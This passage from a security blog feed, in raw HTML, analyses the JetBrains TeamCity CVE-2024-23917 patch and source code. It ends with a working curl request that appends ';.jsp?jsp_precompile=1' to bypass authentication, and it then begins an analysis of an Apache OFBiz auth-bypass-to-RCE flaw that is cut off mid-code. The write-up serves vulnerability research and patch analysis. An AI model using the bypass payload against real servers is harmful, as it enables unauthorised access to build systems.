class="nc">NoSuchFieldException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Method</span> <span class="n">isAuthenticationRequiredMethod</span> <span class="o">=</span> <span class="n">handler</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredMethod</span><span class="o">(</span><span class="s">"isAuthenticationRequired"</span><span class="o">,</span> <span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">setAccessible</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="k">return</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">)</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="n">handler</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="c1">// </span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchMethodException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="o">|</span> <span class="nc">InvocationTargetException</span> <span class="n">ex</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Method</span> <span class="n">isAuthenticationRequiredMethod</span> <span class="o">=</span> <span class="n">authorizationPaths</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredMethod</span><span class="o">(</span><span class="s">"isAuthenticationRequired"</span><span class="o">,</span> <span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="k">return</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">)</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="n">authorizationPaths</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchMethodException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="o">|</span> <span class="nc">InvocationTargetException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">isAuthenticationPresent</span><span class="o">()</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Method</span> <span class="n">getContextMethod</span> <span class="o">=</span> <span class="nc">SecurityContextHolder</span><span class="o">.</span><span class="na">class</span><span class="o">.</span><span class="na">getMethod</span><span class="o">(</span><span class="s">"getContext"</span><span class="o">);</span> <span class="nc">Object</span> <span class="n">securityContext</span> <span class="o">=</span> <span class="n">getContextMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="kc">null</span><span class="o">);</span> <span class="nc">Method</span> <span class="n">getAuthenticationMethod</span> <span class="o">=</span> <span class="n">securityContext</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getMethod</span><span class="o">(</span><span class="s">"getAuthentication"</span><span class="o">);</span> <span class="k">return</span> <span class="n">getAuthenticationMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="n">securityContext</span><span class="o">)</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchMethodException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="o">|</span> <span class="nc">InvocationTargetException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">getSecurityContextHolderClass</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">ClassNotFoundException</span> <span class="o">{</span> <span class="k">return</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"org.springframework.security.core.context.SecurityContextHolder"</span><span class="o">);</span> <span class="o">}</span> <span class="kd">private</span> <span class="nc">Object</span> <span class="nf">intercept_wrap</span><span class="o">(</span><span class="nc">Object</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handlerInterceptor</span><span class="o">,</span> <span class="nc">Method</span> <span class="n">method</span><span class="o">,</span> <span class="nc">Object</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Throwable</span> <span class="o">{</span> <span class="kt">boolean</span> <span class="n">isPreHandleMethod</span> <span class="o">=</span> <span class="n">method</span><span class="o">.</span><span class="na">getName</span><span class="o">().</span><span class="na">equals</span><span class="o">(</span><span class="s">"preHandle"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">isPreHandleMethod</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">interceptPreHandle</span><span class="o">((</span><span class="nc">HttpServletRequest</span><span class="o">)</span> <span class="n">args</span><span class="o">[</span><span class="mi">0</span><span class="o">],</span> <span class="o">(</span><span class="nc">HttpServletResponse</span><span class="o">)</span> <span class="n">args</span><span class="o">[</span><span class="mi">1</span><span class="o">],</span> <span class="n">args</span><span class="o">[</span><span class="mi">2</span><span class="o">],</span> <span class="n">handler</span><span class="o">);</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">null</span><span class="o">;</span> <span class="o">}</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">interceptPreHandle</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handlerInterceptor</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="nf">intercept</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">,</span> <span class="n">handler</span><span class="o">,</span> <span class="n">handlerInterceptor</span><span class="o">);</span> <span class="o">}</span> <span class="kd">static</span> <span class="nc">ServiceLocator</span> <span class="nf">getServiceLocator</span><span class="o">(</span><span class="nc">SecurityInterceptor</span> <span class="n">interceptor</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="n">interceptor</span><span class="o">.</span><span class="na">serviceLocator</span><span class="o">;</span> <span class="o">}</span> <span class="kd">static</span> <span class="nc">Object</span> <span class="nf">createHandlerInterceptorProxy</span><span class="o">(</span><span class="nc">SecurityInterceptor</span> <span class="n">interceptor</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handler</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">ClassNotFoundException</span> <span class="o">{</span> <span class="k">return</span> <span class="n">interceptor</span><span class="o">.</span><span class="na">createHandlerInterceptorProxy</span><span class="o">(</span><span class="n">handler</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <ol> <li> <p>We start by creating a class named SecurityInterceptor (custom name we gave during cleanup) inside which a lot of methods are defined. One of the most interesting methods is <code class="language-plaintext highlighter-rouge">intercept</code>, which from the looks of it, handles all the main logic for fixing the vulnerability.</p> </li> <li> <p>The function starts by checking if the property <code class="language-plaintext highlighter-rouge">teamcity.CVE-2024-23917.patch.enabled</code> is set to <code class="language-plaintext highlighter-rouge">true</code>. If it’s false, the function returns immediately.</p> </li> <li> <p>In a servlet environment, requests can be “included” or “forwarded” which typically occurs when one servlet forwards or includes the request/response to/from another servlet as part of the request handling process.</p> <p>The <code class="language-plaintext highlighter-rouge">if (includeRequestUri != null || request.getAttribute("javax.servlet.forward.request_uri") != null)</code> block checks whether either the include or forward attribute is present. If either is present, it implies the request is either an included or a forwarded request, and the code returns true, meaning interceptor doesn’t need to run.</p> </li> <li> <p>It then checks the path of the given request, if it starts with <code class="language-plaintext highlighter-rouge">/app/agents/</code> or <code class="language-plaintext highlighter-rouge">/update</code>, then the code returns immediately.</p> </li> <li> <p>The patch has a set of whitelisted controllers on which this interceptor is not required to run. From the name of the controllers, for example, <code class="language-plaintext highlighter-rouge">LoginController</code> or <code class="language-plaintext highlighter-rouge">ForgotPasswordController</code>, we can assume that these controllers handle pre-authenticated endpoints which means no need to run the Interceptor.</p> </li> <li> <p>Finally the intercept function calls <code class="language-plaintext highlighter-rouge">checkAuthenticationRequirement</code>, let’s look at what this does. From the flow of the code, this looks to be the core function where the logic exists.</p> </li> </ol> <figure class="highlight"><pre><code class="language-java" data-lang="java"> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">checkAuthenticationRequirement</span><span class="o">(</span><span class="nc">Object</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">String</span> <span class="n">path</span><span class="o">)</span> <span class="o">{</span> <span class="cm">/** * in short this is whats happening * AuthorizationInterceptorImpl.myAuthorizationPaths.isAuthenticationRequired(path) * */</span> <span class="nc">Object</span> <span class="n">authorizationPaths</span><span class="o">;</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Field</span> <span class="n">authorizationPathsField</span> <span class="o">=</span> <span class="n">handler</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredField</span><span class="o">(</span><span class="s">"myAuthorizationPaths"</span><span class="o">);</span> <span class="n">authorizationPathsField</span><span class="o">.</span><span class="na">setAccessible</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="n">authorizationPaths</span> <span class="o">=</span> <span class="n">authorizationPathsField</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">handler</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchFieldException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Method</span> <span class="n">isAuthenticationRequiredMethod</span> <span class="o">=</span> <span class="n">handler</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredMethod</span><span class="o">(</span><span class="s">"isAuthenticationRequired"</span><span class="o">,</span> <span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">setAccessible</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="k">return</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">)</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="n">handler</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="c1">// </span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchMethodException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="o">|</span> <span class="nc">InvocationTargetException</span> <span class="n">ex</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Method</span> <span class="n">isAuthenticationRequiredMethod</span> <span class="o">=</span> <span class="n">authorizationPaths</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredMethod</span><span class="o">(</span><span class="s">"isAuthenticationRequired"</span><span class="o">,</span> <span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="k">return</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">)</span> <span class="n">isAuthenticationRequiredMethod</span><span class="o">.</span><span class="na">invoke</span><span class="o">(</span><span class="n">authorizationPaths</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchMethodException</span> <span class="o">|</span> <span class="nc">IllegalAccessException</span> <span class="o">|</span> <span class="nc">InvocationTargetException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <ol> <li> <p>The function starts by reading <code class="language-plaintext highlighter-rouge">myAuthorizationPaths</code> from <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl</code> class which contains the list of paths.</p> </li> <li> <p>Further down the code, using reflection, it reads the function <code class="language-plaintext highlighter-rouge">isAuthenticationRequired</code> and explicitly invoking this function on the given paths.</p> </li> </ol> <p>This doesn’t make sense, why would the patch add a new interceptor which explicitly invokes an already inbuilt function used for checking if authentication is required or not ?</p> <h2 id="authentication-bypass">Authentication Bypass</h2> <p>A logical explanation could be that, in the newly added interceptor, there was a lot of “if else” conditions where authentication is explicitly bypassed. What if, in the original code, there exists a condition where the auth checks are explicity bypassed ?</p> <p>Let’s explore the interceptors defined in detail to understand this. Grepping for the <code class="language-plaintext highlighter-rouge">AuthorizationInterceptor</code>, we can see the full path of the file: <code class="language-plaintext highlighter-rouge">jetbrains/buildServer/controllers/interceptors/AuthorizationInterceptorImpl.java</code>. Seems like all the interceptors are defined inside the folder <code class="language-plaintext highlighter-rouge">jetbrains/buildServer/controllers/interceptors/</code></p> <p>Exploring through <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl.java</code>, even through the Interceptor has a lot of logic inside, it’s getting invoked somewhere else. Exploring further in the same directory, we can see another very interesting file named <code class="language-plaintext highlighter-rouge">RequestInterceptors.java</code> where interceptors are explicity getting added and invoked. We can confirm this by setting a breakpoint at the <code class="language-plaintext highlighter-rouge">preHandle</code> function:</p> <div align="center"><img src="/images/2024/teamcity/prehandler_breakpoint.png" alt="Breaking at preHandle() to dump memory" height="450" /></div> <p>Let’s explore this <code class="language-plaintext highlighter-rouge">preHandle</code> function in detail:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"> <span class="kd">public</span> <span class="kd">final</span> <span class="kt">boolean</span> <span class="nf">preHandle</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handler</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(!</span><span class="k">this</span><span class="o">.</span><span class="na">requestPreHandlingAllowed</span><span class="o">(</span><span class="n">request</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="nc">Stack</span> <span class="n">reqStack</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">requestIn</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">reqStack</span><span class="o">.</span><span class="na">size</span><span class="o">()</span> <span class="o">&gt;=</span> <span class="mi">70</span> <span class="o">&amp;&amp;</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"__tc_requestStack_overflow"</span><span class="o">)</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="no">LOG</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"Possible infinite recursion of page includes. Request: "</span> <span class="o">+</span> <span class="nc">WebUtil</span><span class="o">.</span><span class="na">getRequestDump</span><span class="o">(</span><span class="n">request</span><span class="o">));</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"__tc_requestStack_overflow"</span><span class="o">,</span> <span class="k">this</span><span class="o">);</span> <span class="nc">Throwable</span> <span class="n">o</span> <span class="o">=</span> <span class="o">(</span><span class="k">new</span> <span class="nc">ServletException</span><span class="o">(</span><span class="s">"Too much recurrent forward or include operations"</span><span class="o">)).</span><span class="na">fillInStackTrace</span><span class="o">();</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"javax.servlet.jsp.jspException"</span><span class="o">,</span> <span class="n">o</span><span class="o">);</span> <span class="nc">RequestDispatcher</span> <span class="n">dispatcher</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getRequestDispatcher</span><span class="o">(</span><span class="s">"/runtimeError.jsp"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">dispatcher</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="n">dispatcher</span><span class="o">.</span><span class="na">include</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">reqStack</span><span class="o">.</span><span class="na">size</span><span class="o">()</span> <span class="o">==</span> <span class="mi">1</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Iterator</span> <span class="n">var5</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">myInterceptors</span><span class="o">.</span><span class="na">iterator</span><span class="o">();</span> <span class="k">while</span><span class="o">(</span><span class="n">var5</span><span class="o">.</span><span class="na">hasNext</span><span class="o">())</span> <span class="o">{</span> <span class="nc">HandlerInterceptor</span> <span class="n">i</span> <span class="o">=</span> <span class="o">(</span><span class="nc">HandlerInterceptor</span><span class="o">)</span><span class="n">var5</span><span class="o">.</span><span class="na">next</span><span class="o">();</span> <span class="k">if</span> <span class="o">(!</span><span class="n">i</span><span class="o">.</span><span class="na">preHandle</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">,</span> <span class="n">handler</span><span class="o">))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <ol> <li> <p>The <code class="language-plaintext highlighter-rouge">requestPreHandlingAllowed(request)</code> method checks if the pre-handling operations are permitted for this request. If not, the method returns true, allowing the request to proceed without additional processing.</p> </li> <li> <p><code class="language-plaintext highlighter-rouge">Stack reqStack = this.requestIn(request)</code>: Retrieves a stack representing some state related to the request, likely tracking recursion.</p> </li> <li> <p>If <code class="language-plaintext highlighter-rouge">reqStack.size() &gt;= 70</code>, it’s an indication that too many recursive operations (forwards or includes) have occurred, suggesting an infinite loop.</p> </li> <li> <p>If recursion is detected, a warning is logged, and a <code class="language-plaintext highlighter-rouge">ServletException</code> is thrown with a message about “Too much recurrent forward or include operations.”</p> </li> <li> <p><code class="language-plaintext highlighter-rouge">If reqStack.size() == 1</code>, indicating this is the first request in a potential stack of recursive operations, the code iterates over myInterceptors.</p> </li> <li> <p>For each <code class="language-plaintext highlighter-rouge">HandlerInterceptor</code> in <code class="language-plaintext highlighter-rouge">myInterceptors</code>, it calls preHandle on the current request, response, and handler. If any of these interceptors return false, indicating they do not allow the request to proceed, the method returns false.</p> </li> </ol> <p>Now it’s clear for us that <code class="language-plaintext highlighter-rouge">RequestInterceptors.java</code> has a <code class="language-plaintext highlighter-rouge">prehandle()</code> which internally invokes all other interceptors one by one. Let’s explore the <code class="language-plaintext highlighter-rouge">requestPreHandlingAllowed(request)</code> function in detail since this method checks if the pre-handling operations are permitted for a given request. If there is a way in which can make the function <code class="language-plaintext highlighter-rouge">requestPreHandlingAllowed(request)</code> return “true” then none of the interceptors are run, that includes the <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl.java</code>.</p> <p><strong>File</strong>: <em>TeamCity/fern/jetbrains/buildServer/controllers/interceptors/RequestInterceptors.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">158</span><span class="o">:</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">requestPreHandlingAllowed</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">)</span> <span class="o">{</span> <span class="mi">159</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">WebUtil</span><span class="o">.</span><span class="na">isJspPrecompilationRequest</span><span class="o">(</span><span class="n">request</span><span class="o">))</span> <span class="o">{</span> <span class="mi">160</span><span class="o">:</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">161</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">162</span><span class="o">:</span> <span class="k">return</span> <span class="o">!</span><span class="k">this</span><span class="o">.</span><span class="na">myPreHandlingDisabled</span><span class="o">.</span><span class="na">matches</span><span class="o">(</span><span class="nc">WebUtil</span><span class="o">.</span><span class="na">getPathWithoutContext</span><span class="o">(</span><span class="n">request</span><span class="o">));</span> <span class="mi">163</span><span class="o">:</span> <span class="o">}</span> <span class="mi">164</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>So <code class="language-plaintext highlighter-rouge">requestPreHandlingAllowed</code> internally calls <code class="language-plaintext highlighter-rouge">WebUtil.isJspPrecompilationRequest</code>, which from the look of it, checks if the request is a precompiled JSP. Let’s explore the function in detail:</p> <p><strong>File</strong>: <em>TeamCity/fern/jetbrains/buildServer/web/util/WebUtil.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">1649</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">isJspPrecompilationRequest</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="kd">final</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">)</span> <span class="o">{</span> <span class="mi">1650</span><span class="o">:</span> <span class="kd">final</span> <span class="nc">String</span> <span class="n">uri</span> <span class="o">=</span> <span class="nc">StringUtil</span><span class="o">.</span><span class="na">notNullize</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getRequestURI</span><span class="o">());</span> <span class="mi">1651</span><span class="o">:</span> <span class="k">return</span> <span class="o">(</span><span class="n">uri</span><span class="o">.</span><span class="na">endsWith</span><span class="o">(</span><span class="s">".jsp"</span><span class="o">)</span> <span class="o">||</span> <span class="n">uri</span><span class="o">.</span><span class="na">endsWith</span><span class="o">(</span><span class="s">".jspf"</span><span class="o">))</span> <span class="o">&amp;&amp;</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"jsp_precompile"</span><span class="o">)</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">1652</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>The method reads request path through <code class="language-plaintext highlighter-rouge">getRequestURI()</code> to check if it ends with “.jsp” or “.jspf” and also checks if the request contains a GET parameter named <code class="language-plaintext highlighter-rouge">jsp_precompile</code>, if so, the function returns true, essentially leading to the original if condition returning true, skipping the entire else part where interceptors are invoked.</p> <p>Tomcat supports the use of <code class="language-plaintext highlighter-rouge">;</code> which is considered a parameter of the path itself. Ex: <em><u>https://example.com/rest/abc;a=b?param=123</u></em>. Here <code class="language-plaintext highlighter-rouge">;a=b</code> is considered a parameter for the path itself ! We can abuse the functionality here since the <code class="language-plaintext highlighter-rouge">WebUtil.isJspPrecompilationRequest</code> reads the requestURI directly and runs <code class="language-plaintext highlighter-rouge">endsWith()</code> to determine if it’s a pre-compiled request.</p> <h2 id="exploit">Exploit</h2> <p>So we can try and hit an endpoint which requires authentication but we can pass <code class="language-plaintext highlighter-rouge">;.jsp</code> at the end along with adding a GET parameter <code class="language-plaintext highlighter-rouge">jsp_precompile=1</code> should bypass the authentication and give us the results.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">a0xnirudh@X1 ~/Downloads/teamcity <span class="nv">$ </span>curl http://localhost:8111/app/rest/projects<span class="p">;</span>.jsp?jsp_precompile<span class="o">=</span>1 &lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"UTF-8"</span> <span class="nv">standalone</span><span class="o">=</span><span class="s2">"yes"</span>?&gt;&lt;projects <span class="nv">count</span><span class="o">=</span><span class="s2">"2"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/app/rest/projects;.jsp?jsp_precompile=1"</span><span class="o">&gt;</span>&lt;project <span class="nb">id</span><span class="o">=</span><span class="s2">"_Root"</span> <span class="nv">name</span><span class="o">=</span><span class="s2">"&amp;lt;Root project&amp;gt;"</span> <span class="nv">description</span><span class="o">=</span><span class="s2">"Contains all other projects"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/app/rest/projects/id:_Root"</span> <span class="nv">webUrl</span><span class="o">=</span><span class="s2">"http://localhost:8111/project.html?projectId=_Root"</span>/&gt;&lt;project <span class="nb">id</span><span class="o">=</span><span class="s2">"Test"</span> <span class="nv">name</span><span class="o">=</span><span class="s2">"test"</span> <span class="nv">parentProjectId</span><span class="o">=</span><span class="s2">"_Root"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/app/rest/projects/id:Test"</span> <span class="nv">webUrl</span><span class="o">=</span><span class="s2">"http://localhost:8111/project.html?projectId=Test"</span>/&gt;&lt;/projects&gt;%</code></pre></figure> Mon, 27 May 2024 00:00:00 -0700 https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/ https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/ java Analysing CVE-2023-51467 - Apache OFBiz Authentication bypass to Remote Code Execution <h2 id="introduction">Introduction</h2> <p>Apache OFBiz is an open-source Enterprise Resource Planning (ERP) solution featuring a suite of applications designed for streamlining and automating various business processes. Notably, a recent discovery has unveiled a critical authentication bypass vulnerability within Apache OFBiz, ultimately exposing the system to Remote Code Execution (CVE-2023-51467). This article aims to explore the details of this vulnerability and explain the process of constructing an exploit leading to Remote Code Execution.</p> <h2 id="installing-and-configuring-ofbiz">Installing and Configuring OFBiz</h2> <p>Download the <a href="https://github.com/apache/ofbiz-framework/releases/tag/release18.12.05" target="_blank">18.12.05</a> release from the official <a href="https://github.com/apache/ofbiz-framework/releases/tag/release18.12.05" target="_blank">Apache OFBiz Github</a> repository and proceed with the local installation. For the purpose of this article, I will be using the Intellij IDEA Community Edition to navigate through the codebase.</p> <div align="center"><img src="/images/2024/apache_ofbiz_directories.png" alt="Apache OFBiz Directories" height="450" /></div> <p>Exploring through the directories we can see the <code class="language-plaintext highlighter-rouge">docs</code> directory which usually contains interesting information including details on project structure, architecture/design and the developer manual. This is instrumental in gaining a good understanding of the core framework. Notably, within the ‘docs’ directory, the <code class="language-plaintext highlighter-rouge">developer-manual.adoc</code> file contains great insights into the project’s structure</p> <p>The base directory structure of Apache OFBiz is organized as follows:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">Apache OFBiz ├── framework/ - Core framework of OFBiz ├── base - Fundamental framework components and services. ├── common - Resources and utilities used throughout the framework ├── entity - Entity engine and data access ├── webapp - Web application components ├── webtools - Contains webtools ├── component-load.xml - ├── applications/ - Various app components with each having subdirectory containing configuration files, entity definitions etc ... ├── runtime/ - Runtime config files, logs, cache ├── plugins/ - External plugins to extend framework abilities</code></pre></figure> <p>A basic unit in Apache OFBiz is called <code class="language-plaintext highlighter-rouge">component</code>. A component is at a minimum a folder with a file inside of it called <code class="language-plaintext highlighter-rouge">ofbiz-component.xml</code>. As per the documentation, a typical component has the following directory structure.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">component-name-here/ ├── config/ - Properties and translation labels <span class="o">(</span>i18n<span class="o">)</span> ├── data/ - XML data to load into the database ├── entitydef/ - Defined database entities ├── groovyScripts/ - A collection of scripts written <span class="k">in </span>Groovy ├── minilang/ - A collection of scripts written <span class="k">in </span>minilang <span class="o">(</span>deprecated<span class="o">)</span> ├── ofbiz-component.xml - The OFBiz main component configuration file ├── servicedef - Defined services. ├── src/ ├── docs/ - component documentation <span class="nb">source</span> └── main/java/ - java <span class="nb">source </span>code └── <span class="nb">test</span>/java/ - java unit-tests ├── testdef - Defined integration-tests ├── webapp - One or more Java webapps including the control servlet └── widget - Screens, forms, menus and other widgets</code></pre></figure> <p>An interesting thing to note here is the <code class="language-plaintext highlighter-rouge">groovyScripts</code> directory containing a collection of scripts written in Groovy. If we can edit or trigger a Groovy file with the contents we control, post authentication bypass, we will be able to achieve remote code execution.</p> <h2 id="understanding-the-patch">Understanding the patch</h2> <p>OFBiz has fixed the vulnerability with a very <a href="https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa" target="_blank">simple patch</a> which is as simple as replacing direct null checks with <code class="language-plaintext highlighter-rouge">UtilValidate.isEmpty()</code> function in the file <code class="language-plaintext highlighter-rouge">LoginWorker.java</code> inside webapp/control directory. So the main file to look for the vulnerability is <code class="language-plaintext highlighter-rouge">org.apache.ofbiz.webapp.control.LoginWorker#checkLogin</code></p> <h2 id="exploring-checklogin">Exploring checkLogin()</h2> <p>Let’s go through the <code class="language-plaintext highlighter-rouge">checkLogin()</code> code line by line to understand how authentication is handled:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/LoginWorker.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">323</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">checkLogin</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">)</span> <span class="o">{</span> <span class="mi">324</span><span class="o">:</span> <span class="nc">GenericValue</span> <span class="n">userLogin</span> <span 